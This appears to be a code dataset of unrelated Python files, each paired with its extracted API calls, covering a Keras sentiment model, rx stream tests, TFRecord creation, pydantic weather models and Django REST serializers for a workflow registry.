INPUT_LENGTH = 100
# Prepare data
X_train, Y_train, X_test, Y_test = sc_utils.load_data()
X_train, Y_train, X_val, Y_val, X_test, Y_test, tokenizer = sc_utils.preprocess_data(X_train, Y_train, X_test, Y_test, INPUT_LENGTH)
embedding_matrix = sc_utils.create_embedding_matrix(tokenizer)
print("X_train.shape: " + str(X_train.shape))
print("Y_train.shape: " + str(Y_train.shape))
print("X_val.shape: " + str(X_val.shape))
print("Y_val.shape: " + str(Y_val.shape))
print("X_test.shape: " + str(X_test.shape))
print("Y_test.shape: " + str(Y_test.shape))
print("embedding_matrix.shape: " + str(embedding_matrix.shape))
# Create model
#model = model_factory.create_baseline_model(embedding_matrix, INPUT_LENGTH)
model = model_factory.create_rnn_model(embedding_matrix, INPUT_LENGTH)
#model = model_factory.create_bidir_rnn_model(embedding_matrix, INPUT_LENGTH)
#model = model_factory.create_train_emb_rnn_model(embedding_matrix, INPUT_LENGTH)
model.summary()
# Train model
model.fit(X_train, Y_train, batch_size=200, epochs=30)
# Evaluate model on validation set
val_loss, val_accuracy = model.evaluate(X_val, Y_val, verbose=0)
print("Accuracy on validation set: " + str(val_accuracy * 100) + "%")
# Evaluate model on test set
test_loss, test_accuracy = model.evaluate(X_test, Y_test, verbose=0)
print("Accuracy on test set: " + str(test_accuracy * 100) + "%")
# Test model on my own texts
reviews = [
"This movie is bad. I don't like it it all. It's terrible.",
"I love this movie. I've seen it many times and it's still awesome.",
"I don't think this movie is as bad as most people say. It's actually pretty good."
]
print("Testing model on my own texts:")
print(reviews)
reviews = tokenizer.texts_to_sequences(reviews)
reviews = pad_sequences(reviews, maxlen=INPUT_LENGTH, padding="post")
reviews = np.array(reviews)
pred = model.predict(reviews)
print(pred)
print("The model predicts:")
sentiment_str = "Negative" if pred[0][0] < 0.5 else "Positive"
print(sentiment_str + " on the first text")
sentiment_str = "Negative" if pred[1][0] < 0.5 else "Positive"
print(sentiment_str + " on the second text")
sentiment_str = "Negative" if pred[2][0] < 0.5 else "Positive"
print(sentiment_str + " on the third text")
| [
"keras.preprocessing.sequence.pad_sequences",
"sc_utils.load_data",
"sc_utils.create_embedding_matrix",
"numpy.array",
"model_factory.create_rnn_model",
"sc_utils.preprocess_data"
] | [((229, 249), 'sc_utils.load_data', 'sc_utils.load_data', ([], {}), '()\n', (247, 249), False, 'import sc_utils\n'), ((310, 382), 'sc_utils.preprocess_data', 'sc_utils.preprocess_data', (['X_train', 'Y_train', 'X_test', 'Y_test', 'INPUT_LENGTH'], {}), '(X_train, Y_train, X_test, Y_test, INPUT_LENGTH)\n', (334, 382), False, 'import sc_utils\n'), ((402, 445), 'sc_utils.create_embedding_matrix', 'sc_utils.create_embedding_matrix', (['tokenizer'], {}), '(tokenizer)\n', (434, 445), False, 'import sc_utils\n'), ((876, 938), 'model_factory.create_rnn_model', 'model_factory.create_rnn_model', (['embedding_matrix', 'INPUT_LENGTH'], {}), '(embedding_matrix, INPUT_LENGTH)\n', (906, 938), False, 'import model_factory\n'), ((1908, 1967), 'keras.preprocessing.sequence.pad_sequences', 'pad_sequences', (['reviews'], {'maxlen': 'INPUT_LENGTH', 'padding': '"""post"""'}), "(reviews, maxlen=INPUT_LENGTH, padding='post')\n", (1921, 1967), False, 'from keras.preprocessing.sequence import pad_sequences\n'), ((1978, 1995), 'numpy.array', 'np.array', (['reviews'], {}), '(reviews)\n', (1986, 1995), True, 'import numpy as np\n')] |
#Copyright (c) 2019 Uber Technologies, Inc.
#
#Licensed under the Uber Non-Commercial License (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at the root directory of this project.
#
#See the License for the specific language governing permissions and
#limitations under the License.
import pickle
class Policy:
needs_stats = False
def seed(self, seed):
pass
def act(self, states):
raise NotImplementedError()
def reset(self):
pass
def supp_fitness(self): # pylint: disable=no-self-use
return 0.0
def set_theta(self, theta):
raise NotImplementedError()
def _serialize(self, *args, **kwargs): # pylint: disable=no-self-use
frame = pickle.dumps((args, kwargs))
return [frame]
@classmethod
def deserialize(cls, frames):
args, kwargs = pickle.loads(frames[0])
return cls(*args, **kwargs)
| [
"pickle.loads",
"pickle.dumps"
] | [((790, 818), 'pickle.dumps', 'pickle.dumps', (['(args, kwargs)'], {}), '((args, kwargs))\n', (802, 818), False, 'import pickle\n'), ((917, 940), 'pickle.loads', 'pickle.loads', (['frames[0]'], {}), '(frames[0])\n', (929, 940), False, 'import pickle\n')] |
import unittest
import rx
class History(rx.Stream):
def __init__(self):
self.events = []
super().__init__()
def notify(self, value):
self.events.append(value)
class TestRx(unittest.TestCase):
def test_combine_streams(self):
clicks = rx.Stream()
indices = rx.Stream()
result = rx.scan_reset(
clicks,
accumulator=lambda a, i: a + i,
reset=indices)
history = History()
result.register(history)
indices.emit(10)
indices.emit(20)
clicks.emit(+0)
indices.emit(30)
clicks.emit(+1)
result = history.events
expect = [20, 31]
self.assertEqual(expect, result)
def test_combine_streams_with_seed_values(self):
clicks = rx.Stream()
indices = rx.Stream()
result = rx.scan_reset_emit_seed(
clicks, lambda a, i: a + i,
reset=indices)
history = History()
result.register(history)
indices.emit(10)
indices.emit(20)
indices.emit(30)
result = history.events
expect = [10, 20, 30]
self.assertEqual(expect, result)
def test_general_case(self):
clicks = rx.Stream()
indices = rx.Stream()
result = rx.scan_reset_emit_seed(
clicks, lambda a, i: a + i,
reset=indices)
history = History()
result.register(history)
indices.emit(10)
clicks.emit(1)
clicks.emit(-1)
indices.emit(20)
clicks.emit(1)
indices.emit(30)
clicks.emit(-1)
result = history.events
expect = [10, 11, 10, 20, 21, 30, 29]
self.assertEqual(expect, result)
| [
"rx.Stream",
"rx.scan_reset",
"rx.scan_reset_emit_seed"
] | [((282, 293), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (291, 293), False, 'import rx\n'), ((312, 323), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (321, 323), False, 'import rx\n'), ((341, 409), 'rx.scan_reset', 'rx.scan_reset', (['clicks'], {'accumulator': '(lambda a, i: a + i)', 'reset': 'indices'}), '(clicks, accumulator=lambda a, i: a + i, reset=indices)\n', (354, 409), False, 'import rx\n'), ((815, 826), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (824, 826), False, 'import rx\n'), ((845, 856), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (854, 856), False, 'import rx\n'), ((874, 940), 'rx.scan_reset_emit_seed', 'rx.scan_reset_emit_seed', (['clicks', '(lambda a, i: a + i)'], {'reset': 'indices'}), '(clicks, lambda a, i: a + i, reset=indices)\n', (897, 940), False, 'import rx\n'), ((1267, 1278), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (1276, 1278), False, 'import rx\n'), ((1297, 1308), 'rx.Stream', 'rx.Stream', ([], {}), '()\n', (1306, 1308), False, 'import rx\n'), ((1326, 1392), 'rx.scan_reset_emit_seed', 'rx.scan_reset_emit_seed', (['clicks', '(lambda a, i: a + i)'], {'reset': 'indices'}), '(clicks, lambda a, i: a + i, reset=indices)\n', (1349, 1392), False, 'import rx\n')] |
from modules.visitor.symbol_table import SymbolTable
from .ast_node import ASTNode
from .if_node import IfNode
class LineNode(ASTNode):
def __init__(self, expression, depth, no_end = False):
self.expression = expression
self.depth = depth
self.no_end = no_end
super().__init__(expression.position)
def __repr__(self):
return f"[{self.expression}]"
def interpret(self, interpreter):
return self.get_expression(interpreter)
def transpile(self, transpiler):
transpiler.depth = self.depth
expression = self.get_expression(transpiler)
indent = "\t" * self.depth
return f"{indent}{expression}{'' if self.no_end else ';'}\n"
def get_expression(self, visitor):
if isinstance(self.expression, IfNode):
visitor.symbol_table = SymbolTable(visitor.symbol_table)
expression = self.expression.visit(visitor)
visitor.symbol_table = visitor.symbol_table.parent
return expression
return self.expression.visit(visitor)
| [
"modules.visitor.symbol_table.SymbolTable"
] | [((843, 876), 'modules.visitor.symbol_table.SymbolTable', 'SymbolTable', (['visitor.symbol_table'], {}), '(visitor.symbol_table)\n', (854, 876), False, 'from modules.visitor.symbol_table import SymbolTable\n')] |
from __future__ import absolute_import
from erlpack import pack
def test_nil():
assert pack(None) == b'\x83s\x03nil'
| [
"erlpack.pack"
] | [((93, 103), 'erlpack.pack', 'pack', (['None'], {}), '(None)\n', (97, 103), False, 'from erlpack import pack\n')] |
import unittest
import operative
import datetime
from caliendo.patch import patch
from caliendo import expected_value
from nose.tools import eq_, ok_
from operative.settings import TEST_FTP_LOGIN
class ReportTest(unittest.TestCase):
"""
Test the various reports.
"""
@patch('operative.FTPConnection.get_files')
@patch('operative.FTPConnection._establish_connection')
@patch('operative.FTPConnection._close_connection')
def test_line_item_report(self):
"""
Test LineItemReport
"""
from operative.reports.line_item_report import LineItemReport
def __get_and_test(path, since):
ftp_creds = operative.FTPCredentials(**TEST_FTP_LOGIN)
line_item_reports = LineItemReport().get_report_files(ftp_credentials=ftp_creds, ftp_path=path, since=since)
for lir in line_item_reports:
observed_value = str(lir.data[0])
eq_(expected_value.get_or_store(observed_value), observed_value)
# get all files
__get_and_test(path='/flatfile', since=None)
# get one file - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 1, 7, 0, 42))
# get zero files - using "since"
__get_and_test(path='/flatfile', since=datetime.datetime(2014, 2, 1))
# get zero files - only directories in path
__get_and_test(path='/', since=None)
| [
"caliendo.expected_value.get_or_store",
"datetime.datetime",
"operative.reports.line_item_report.LineItemReport",
"caliendo.patch.patch",
"operative.FTPCredentials"
] | [((290, 332), 'caliendo.patch.patch', 'patch', (['"""operative.FTPConnection.get_files"""'], {}), "('operative.FTPConnection.get_files')\n", (295, 332), False, 'from caliendo.patch import patch\n'), ((338, 392), 'caliendo.patch.patch', 'patch', (['"""operative.FTPConnection._establish_connection"""'], {}), "('operative.FTPConnection._establish_connection')\n", (343, 392), False, 'from caliendo.patch import patch\n'), ((398, 448), 'caliendo.patch.patch', 'patch', (['"""operative.FTPConnection._close_connection"""'], {}), "('operative.FTPConnection._close_connection')\n", (403, 448), False, 'from caliendo.patch import patch\n'), ((675, 717), 'operative.FTPCredentials', 'operative.FTPCredentials', ([], {}), '(**TEST_FTP_LOGIN)\n', (699, 717), False, 'import operative\n'), ((1177, 1213), 'datetime.datetime', 'datetime.datetime', (['(2014)', '(1)', '(7)', '(0)', '(42)'], {}), '(2014, 1, 7, 0, 42)\n', (1194, 1213), False, 'import datetime\n'), ((1304, 1333), 'datetime.datetime', 'datetime.datetime', (['(2014)', '(2)', '(1)'], {}), '(2014, 2, 1)\n', (1321, 1333), False, 'import datetime\n'), ((750, 766), 'operative.reports.line_item_report.LineItemReport', 'LineItemReport', ([], {}), '()\n', (764, 766), False, 'from operative.reports.line_item_report import LineItemReport\n'), ((951, 994), 'caliendo.expected_value.get_or_store', 'expected_value.get_or_store', (['observed_value'], {}), '(observed_value)\n', (978, 994), False, 'from caliendo import expected_value\n')] |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import io
import os
import random
from PIL import Image, ImageStat
import tensorflow as tf
from datasets import dataset_utils
flags = tf.app.flags
flags.DEFINE_string('dataset_dir',
'/home/ace19/dl_data/materials',
'Root Directory to dataset.')
flags.DEFINE_string('output_path',
'/home/ace19/dl_data/materials/query.record',
'Path to output TFRecord')
flags.DEFINE_string('dataset_category',
'query',
'dataset category, train|validation|test')
FLAGS = flags.FLAGS
def get_label_map(label_to_index):
label_map = {}
# cls_lst = os.listdir(FLAGS.dataset_dir)
cls_path = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(cls_path)
for i, cls in enumerate(cls_lst):
data_path = os.path.join(cls_path, cls)
img_lst = os.listdir(data_path)
for n, img in enumerate(img_lst):
img_path = os.path.join(data_path, img)
label_map[img_path] = label_to_index[cls]
return label_map
def dict_to_tf_example(image_name,
dataset_directory,
label_map=None,
image_subdirectory='train'):
"""
Args:
image: a single image name
dataset_directory: Path to root directory holding PCam dataset
label_map: A map from string label names to integers ids.
image_subdirectory: String specifying subdirectory within the
PCam dataset directory holding the actual image data.
Returns:
example: The converted tf.Example.
Raises:
ValueError: if the image pointed to by image is not a valid PNG
"""
# full_path = os.path.join(dataset_directory, image_subdirectory, image_name)
full_path = os.path.join(dataset_directory, image_name)
with tf.io.gfile.GFile(full_path, 'rb') as fid:
encoded = fid.read()
encoded_io = io.BytesIO(encoded)
image = Image.open(encoded_io)
width, height = image.size
format = image.format
image_stat = ImageStat.Stat(image)
mean = image_stat.mean
std = image_stat.stddev
key = hashlib.sha256(encoded).hexdigest()
# if image_subdirectory.lower() == 'test':
# label = -1
# else:
# label = int(label_map[image_name])
label = int(label_map[full_path])
example = tf.train.Example(features=tf.train.Features(feature={
'image/height': dataset_utils.int64_feature(height),
'image/width': dataset_utils.int64_feature(width),
'image/filename': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/fullpath': dataset_utils.bytes_feature(full_path.encode('utf8')),
'image/source_id': dataset_utils.bytes_feature(image_name.encode('utf8')),
'image/key/sha256': dataset_utils.bytes_feature(key.encode('utf8')),
'image/encoded': dataset_utils.bytes_feature(encoded),
'image/format': dataset_utils.bytes_feature(format.encode('utf8')),
'image/class/label': dataset_utils.int64_feature(label),
# 'image/text': dataset_util.bytes_feature('label_text'.encode('utf8'))
'image/mean': dataset_utils.float_list_feature(mean),
'image/std': dataset_utils.float_list_feature(std)
}))
return example
def main(_):
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.INFO)
options = tf.io.TFRecordOptions(tf.io.TFRecordCompressionType.GZIP)
writer = tf.io.TFRecordWriter(FLAGS.output_path, options=options)
# cls_lst = os.listdir(FLAGS.dataset_dir)
dataset_lst = os.path.join(FLAGS.dataset_dir, FLAGS.dataset_category)
cls_lst = os.listdir(dataset_lst)
cls_lst.sort()
label_to_index = {}
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
if os.path.isdir(cls_path):
label_to_index[cls] = i
label_map = get_label_map(label_to_index)
random.shuffle(cls_lst)
for i, cls in enumerate(cls_lst):
cls_path = os.path.join(dataset_lst, cls)
img_lst = os.listdir(cls_path)
total = len(img_lst)
for idx, image in enumerate(img_lst):
if idx % 100 == 0:
tf.compat.v1.logging.info('On image %d of %d', idx, total)
tf_example = dict_to_tf_example(image, cls_path, label_map, FLAGS.dataset_category)
writer.write(tf_example.SerializeToString())
writer.close()
if __name__ == '__main__':
tf.compat.v1.app.run()
| [
"os.listdir",
"io.BytesIO",
"datasets.dataset_utils.int64_feature",
"os.path.isdir",
"random.shuffle",
"PIL.Image.open",
"tensorflow.compat.v1.logging.info",
"hashlib.sha256",
"datasets.dataset_utils.bytes_feature",
"tensorflow.compat.v1.logging.set_verbosity",
"datasets.dataset_utils.float_list_feature",
"tensorflow.io.TFRecordOptions",
"tensorflow.io.TFRecordWriter",
"os.path.join",
"PIL.ImageStat.Stat",
"tensorflow.compat.v1.app.run",
"tensorflow.io.gfile.GFile"
] | [((832, 887), 'os.path.join', 'os.path.join', (['FLAGS.dataset_dir', 'FLAGS.dataset_category'], {}), '(FLAGS.dataset_dir, FLAGS.dataset_category)\n', (844, 887), False, 'import os\n'), ((902, 922), 'os.listdir', 'os.listdir', (['cls_path'], {}), '(cls_path)\n', (912, 922), False, 'import os\n'), ((1947, 1990), 'os.path.join', 'os.path.join', (['dataset_directory', 'image_name'], {}), '(dataset_directory, image_name)\n', (1959, 1990), False, 'import os\n'), ((2089, 2108), 'io.BytesIO', 'io.BytesIO', (['encoded'], {}), '(encoded)\n', (2099, 2108), False, 'import io\n'), ((2121, 2143), 'PIL.Image.open', 'Image.open', (['encoded_io'], {}), '(encoded_io)\n', (2131, 2143), False, 'from PIL import Image, ImageStat\n'), ((2218, 2239), 'PIL.ImageStat.Stat', 'ImageStat.Stat', (['image'], {}), '(image)\n', (2232, 2239), False, 'from PIL import Image, ImageStat\n'), ((3467, 3528), 'tensorflow.compat.v1.logging.set_verbosity', 'tf.compat.v1.logging.set_verbosity', (['tf.compat.v1.logging.INFO'], {}), '(tf.compat.v1.logging.INFO)\n', (3501, 3528), True, 'import tensorflow as tf\n'), ((3544, 3601), 'tensorflow.io.TFRecordOptions', 'tf.io.TFRecordOptions', (['tf.io.TFRecordCompressionType.GZIP'], {}), '(tf.io.TFRecordCompressionType.GZIP)\n', (3565, 3601), True, 'import tensorflow as tf\n'), ((3615, 3671), 'tensorflow.io.TFRecordWriter', 'tf.io.TFRecordWriter', (['FLAGS.output_path'], {'options': 'options'}), '(FLAGS.output_path, options=options)\n', (3635, 3671), True, 'import tensorflow as tf\n'), ((3737, 3792), 'os.path.join', 'os.path.join', (['FLAGS.dataset_dir', 'FLAGS.dataset_category'], {}), '(FLAGS.dataset_dir, FLAGS.dataset_category)\n', (3749, 3792), False, 'import os\n'), ((3807, 3830), 'os.listdir', 'os.listdir', (['dataset_lst'], {}), '(dataset_lst)\n', (3817, 3830), False, 'import os\n'), ((4086, 4109), 'random.shuffle', 'random.shuffle', (['cls_lst'], {}), '(cls_lst)\n', (4100, 4109), False, 'import random\n'), ((4626, 4648), 'tensorflow.compat.v1.app.run', 'tf.compat.v1.app.run', ([], {}), '()\n', (4646, 4648), True, 'import tensorflow as tf\n'), ((981, 1008), 'os.path.join', 'os.path.join', (['cls_path', 'cls'], {}), '(cls_path, cls)\n', (993, 1008), False, 'import os\n'), ((1027, 1048), 'os.listdir', 'os.listdir', (['data_path'], {}), '(data_path)\n', (1037, 1048), False, 'import os\n'), ((2000, 2034), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['full_path', '"""rb"""'], {}), "(full_path, 'rb')\n", (2017, 2034), True, 'import tensorflow as tf\n'), ((3931, 3961), 'os.path.join', 'os.path.join', (['dataset_lst', 'cls'], {}), '(dataset_lst, cls)\n', (3943, 3961), False, 'import os\n'), ((3973, 3996), 'os.path.isdir', 'os.path.isdir', (['cls_path'], {}), '(cls_path)\n', (3986, 3996), False, 'import os\n'), ((4167, 4197), 'os.path.join', 'os.path.join', (['dataset_lst', 'cls'], {}), '(dataset_lst, cls)\n', (4179, 4197), False, 'import os\n'), ((4216, 4236), 'os.listdir', 'os.listdir', (['cls_path'], {}), '(cls_path)\n', (4226, 4236), False, 'import os\n'), ((1114, 1142), 'os.path.join', 'os.path.join', (['data_path', 'img'], {}), '(data_path, img)\n', (1126, 1142), False, 'import os\n'), ((2305, 2328), 'hashlib.sha256', 'hashlib.sha256', (['encoded'], {}), '(encoded)\n', (2319, 2328), False, 'import hashlib\n'), ((4360, 4418), 'tensorflow.compat.v1.logging.info', 'tf.compat.v1.logging.info', (['"""On image %d of %d"""', 'idx', 'total'], {}), "('On image %d of %d', idx, total)\n", (4385, 4418), True, 'import tensorflow as tf\n'), ((2597, 2632), 'datasets.dataset_utils.int64_feature', 'dataset_utils.int64_feature', (['height'], {}), '(height)\n', (2624, 2632), False, 'from datasets import dataset_utils\n'), ((2657, 2691), 'datasets.dataset_utils.int64_feature', 'dataset_utils.int64_feature', (['width'], {}), '(width)\n', (2684, 2691), False, 'from datasets import dataset_utils\n'), ((3041, 3077), 'datasets.dataset_utils.bytes_feature', 'dataset_utils.bytes_feature', (['encoded'], {}), '(encoded)\n', (3068, 3077), False, 'from datasets import dataset_utils\n'), ((3184, 3218), 'datasets.dataset_utils.int64_feature', 'dataset_utils.int64_feature', (['label'], {}), '(label)\n', (3211, 3218), False, 'from datasets import dataset_utils\n'), ((3322, 3360), 'datasets.dataset_utils.float_list_feature', 'dataset_utils.float_list_feature', (['mean'], {}), '(mean)\n', (3354, 3360), False, 'from datasets import dataset_utils\n'), ((3383, 3420), 'datasets.dataset_utils.float_list_feature', 'dataset_utils.float_list_feature', (['std'], {}), '(std)\n', (3415, 3420), False, 'from datasets import dataset_utils\n')] |
from pydantic import BaseModel, Field
from app.shared.enums import Units
class LocationBase(BaseModel):
units: Units = Units.METRIC
class CityLocation(BaseModel):
city: str
state: str | None = Field(default=None, max_length=3)
country: str | None = None
class Config:
schema_extra = {
"example": {
"city": "gothenburg"
}
}
class CoordsLocation(LocationBase):
lat: float
lon: float
class Config:
schema_extra = {
"example": {
"lat": "50",
"lon": "30"
}
}
class WeatherOut(BaseModel):
temperature: str
units: Units
city: str | None = None
country: str | None = None
weather: str | None = None
lat: float | None = None
lon: float | None = None
| [
"pydantic.Field"
] | [((210, 243), 'pydantic.Field', 'Field', ([], {'default': 'None', 'max_length': '(3)'}), '(default=None, max_length=3)\n', (215, 243), False, 'from pydantic import BaseModel, Field\n')] |
# Copyright 2014 The University of Edinburgh
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# from models import WorkspaceItem
from models import Workspace
from models import PESig
from models import FunctionSig
from models import LiteralSig
from models import PEImplementation
from models import FnImplementation
from models import RegistryUserGroup
from models import Connection
from models import FunctionParameter
from django.contrib.auth.models import User
from django.contrib.auth.models import Group
from rest_framework import serializers
from vercereg.utils import get_base_rest_uri
##############################################################################
class UserSerializer(serializers.HyperlinkedModelSerializer):
def get_reg_groups(self, obj):
toret = []
request = self.context.get('request')
for v in obj.groups.values():
group_id = v['id']
g = Group.objects.get(id=group_id)
try:
rug_instance = RegistryUserGroup.objects.get(group=g)
rug = (get_base_rest_uri(request) + 'registryusergroups/' +
str(rug_instance.id) + '/')
toret.append(rug)
except RegistryUserGroup.DoesNotExist:
pass
return toret
groups = serializers.SerializerMethodField('get_reg_groups')
def restore_object(self, attrs, instance=None):
user = super(UserSerializer, self).restore_object(attrs, instance)
user.set_password(attrs['password'])
return user
class Meta:
model = User
fields = (
'url',
'username',
'email',
'first_name',
'last_name',
'password',
'groups',
'ownsgroups')
write_only_fields = ('password',)
read_only_fields = ('ownsgroups',)
# class UserUpdateSerializer(serializers.HyperlinkedModelSerializer):
# groups = serializers.SerializerMethodField('get_reg_groups')
#
# def get_reg_groups(self, obj):
# toret = []
# request = self.context.get('request')
# for v in obj.groups.values():
# group_id = v['id']
# g = Group.objects.get(id=group_id)
# try:
# rug_instance = RegistryUserGroup.objects.get(group=g)
# rug = get_base_rest_uri(request) + 'registryusergroups/' +
# str(rug_instance.id) + '/'
# toret.append(rug)
# except RegistryUserGroup.DoesNotExist:
# pass
# return toret
#
# def restore_object(self, attrs, instance=None):
# user = super(UserUpdateSerializer, self).restore_object(attrs, instance)
# user.set_password(attrs['password'])
# return user
#
# class Meta:
# model = User
# fields = ('username', 'email', 'first_name', 'last_name', 'password',
# 'groups', 'ownsgroups',)
# write_only_fields = ('password',)
# read_only_fields = ('username',)
##############################################################################
class RegistryUserGroupSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# FIXME: The following is excluded as it break django rest for some reason.
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', 'owner', )
class RegistryUserGroupPutSerializer(serializers.HyperlinkedModelSerializer):
group_name = serializers.CharField(source='get_group_name')
# ownerusername = serializers.CharField(source='get_owner_username',
# read_only=True)
class Meta:
model = RegistryUserGroup
fields = ('url', 'group_name', 'group', 'owner', 'description', )
read_only_fields = ('group', )
##############################################################################
# class AdminRegistryUserGroupSerializer
# (serializers.HyperlinkedModelSerializer):
# group_name = serializers.CharField(source='get_group_name')#,
# read_only=True)
# owner_username = serializers.CharField(source='get_owner_username',
# read_only=True)
#
# class Meta:
# model = RegistryUserGroup
# fields = ('url', 'group_name', 'owner_username',
# 'group', 'owner', 'description')
# read_only_fields = ('group', )
##############################################################################
class GroupSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Group
fields = ('name',)
##############################################################################
class PEImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PEImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class FnImplementationSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FnImplementation
fields = (
'id',
'url',
'description',
'code',
'parent_sig',
'pckg',
'name',
'user',
'workspace',
'clone_of')
read_only_fields = ('user', 'creation_date',)
##############################################################################
class WorkspaceSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Workspace
depth = 0
fields = ('id', 'url', 'name', 'owner', 'description',
'clone_of', 'creation_date')
read_only_fields = ('owner', 'creation_date',)
##############################################################################
class WorkspaceDeepSerializer(serializers.HyperlinkedModelSerializer):
pes = serializers.CharField(source='get_pesigs')
functions = serializers.CharField(source='get_fnsigs')
literals = serializers.CharField(source='get_literalsigs')
peimplementations = serializers.CharField(source='get_peimplementations')
fnimplementations = serializers.CharField(source='get_fnimplementations')
class Meta:
model = Workspace
# TODO (nice-to-have) revisit the depth issue, user serialization is
# not good enough - disabled for now.
depth = 0
read_only_fields = ('owner', 'creation_date')
def transform_pes(self, obj, value):
request = self.context.get('request')
pes = obj.pesig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'pes/' +
str(p.id), pes)
def transform_functions(self, obj, value):
request = self.context.get('request')
fns = obj.functionsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'functions/' +
str(p.id), fns)
def transform_literals(self, obj, value):
request = self.context.get('request')
lits = obj.literalsig_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'literals/' +
str(p.id), lits)
def transform_peimplementations(self, obj, value):
request = self.context.get('request')
peimpls = obj.peimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'peimpls/' +
str(p.id), peimpls)
def transform_fnimplementations(self, obj, value):
request = self.context.get('request')
fnimpls = obj.fnimplementation_set.get_queryset()
return map(lambda p: get_base_rest_uri(request) +
'fnimpls/' +
str(p.id), fnimpls)
##############################################################################
class PESigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PESig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'connections',
'creation_date',
'peimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class ConnectionSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = Connection
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
class FunctionParameterSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = FunctionParameter
# Pip package update 12/10/2018 (davve.ath)
# ADDED: fields, can't have empty fields
fields = '__all__'
##############################################################################
class FunctionSigSerializer(serializers.HyperlinkedModelSerializer):
# implementations = serializers.WritableField
# (source='fnimplementation_set', required=False)
class Meta:
model = FunctionSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'user',
'description',
'creation_date',
'return_type',
'parameters',
'fnimpls',
'clone_of')
read_only_fields = ('user', 'creation_date', )
##############################################################################
class LiteralSigSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = LiteralSig
fields = (
'url',
'id',
'workspace',
'pckg',
'name',
'value',
'description',
'creation_date',
'clone_of')
read_only_fields = ('user', 'creation_date', )
| [
"rest_framework.serializers.SerializerMethodField",
"vercereg.utils.get_base_rest_uri",
"rest_framework.serializers.CharField",
"models.RegistryUserGroup.objects.get",
"django.contrib.auth.models.Group.objects.get"
] | [((1808, 1859), 'rest_framework.serializers.SerializerMethodField', 'serializers.SerializerMethodField', (['"""get_reg_groups"""'], {}), "('get_reg_groups')\n", (1841, 1859), False, 'from rest_framework import serializers\n'), ((3620, 3666), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_group_name"""'}), "(source='get_group_name')\n", (3641, 3666), False, 'from rest_framework import serializers\n'), ((4017, 4063), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_group_name"""'}), "(source='get_group_name')\n", (4038, 4063), False, 'from rest_framework import serializers\n'), ((6720, 6762), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_pesigs"""'}), "(source='get_pesigs')\n", (6741, 6762), False, 'from rest_framework import serializers\n'), ((6779, 6821), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_fnsigs"""'}), "(source='get_fnsigs')\n", (6800, 6821), False, 'from rest_framework import serializers\n'), ((6837, 6884), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_literalsigs"""'}), "(source='get_literalsigs')\n", (6858, 6884), False, 'from rest_framework import serializers\n'), ((6909, 6962), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_peimplementations"""'}), "(source='get_peimplementations')\n", (6930, 6962), False, 'from rest_framework import serializers\n'), ((6987, 7040), 'rest_framework.serializers.CharField', 'serializers.CharField', ([], {'source': '"""get_fnimplementations"""'}), "(source='get_fnimplementations')\n", (7008, 7040), False, 'from rest_framework import serializers\n'), ((1422, 1452), 'django.contrib.auth.models.Group.objects.get', 'Group.objects.get', ([], {'id': 'group_id'}), '(id=group_id)\n', (1439, 1452), False, 'from django.contrib.auth.models import Group\n'), ((1501, 1539), 'models.RegistryUserGroup.objects.get', 'RegistryUserGroup.objects.get', ([], {'group': 'g'}), '(group=g)\n', (1530, 1539), False, 'from models import RegistryUserGroup\n'), ((7439, 7465), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (7456, 7465), False, 'from vercereg.utils import get_base_rest_uri\n'), ((7703, 7729), 'vercereg.utils.get_base_rest_uri', 'get_base_rest_uri', (['request'], {}), '(request)\n', (7720, 7729), False, 'from vercereg.utils import get_base_rest_uri\n'), ((7972, 7998), 